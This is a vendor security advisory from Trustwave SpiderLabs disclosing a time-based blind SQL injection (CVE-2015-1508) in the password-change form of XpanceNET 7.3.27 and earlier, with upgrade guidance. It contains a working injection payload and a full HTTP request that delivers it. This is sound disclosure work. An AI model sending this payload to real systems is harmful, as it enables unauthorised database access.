Trustwave SpiderLabs Security Advisory TWSL2015-005: Blind SQL injection in XpanceNET Published: 04/24/15 Version: 1.0 Vendor: Brainworks Software (http://www.brainworks.com/) Products: XpanceNET Version affected: 7.3.27 and prior Product description: Xpance is an automated workflow system designed to manage, track, report, and archive print and digital assets for newspapers, magazines, and a wide range other publications. Xpance controls all file management, so users spend their time producing ads - not searching for them. Xpance retrieves information from the business system, allowing it to track and confirm billing information as assets move through the production cycle, all the while monitoring critical quality issues virtually eliminating the possibility of errors. Xpance automates all production workflow processes, including pre-flighting digital assets before printing. Xpance performs over 200 functions specifically designed to increase productivity and decrease costs in the production department. Finding 1: SQL injection Vulnerability Credit: Piotr Karolak of Trustwave SpiderLabs CVE: CVE-2015-1508 CWE: CWE-89 The UserID parameter is vulnerable to Blind (Time-Based) SQL injection attack. When payload 'waitfor delay'0:0:20'-- is submitted in the UserID parameter, it takes the application 20817 milliseconds to respond to the request, compared with 837 milliseconds for the original request, indicating that the injected SQL command caused a time delay. This issue can be exploited in an automated manner, using some tools like SQLMAP. REQUEST: ======== POST /index.php/request_passwordChange HTTP/1.1 Host: a.b.c.d Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://a.b.c.d/index.php/forgot_password Content-Type: application/x-www-form-urlencoded Content-Length: 39 Cookie: _xnet=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d35d236692091bd6e232f1fcd210d2dd%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22192.168.75.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221425891428%22%3B%7D2a739896d2fba1a821592e6823a1650e; _ga=GA1.2.356164103.1425891205; _gat=1; __qca=P0-895842040-1425891220263; __unam=84335f5-14bfdbe3353-2b5ab1bd-1 site=23&UserID=user@example.com'%20waitfor%20delay'0%3a0%3a20'-- Remediation Steps: Upgrade to version 7.3.28 or the latest stable version of XpanceNet. Please note that Trustwave SpiderLabs have not verified this fix. Revision History: 03/09/15 - Vulnerability disclosed 04/03/15 - Patch released by vendor 04/24/15 - Advisory published References 1. http://www.brainworks.com/products/xpance.phtml 2. https://www.owasp.org/index.php/Blind_SQL_Injection About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.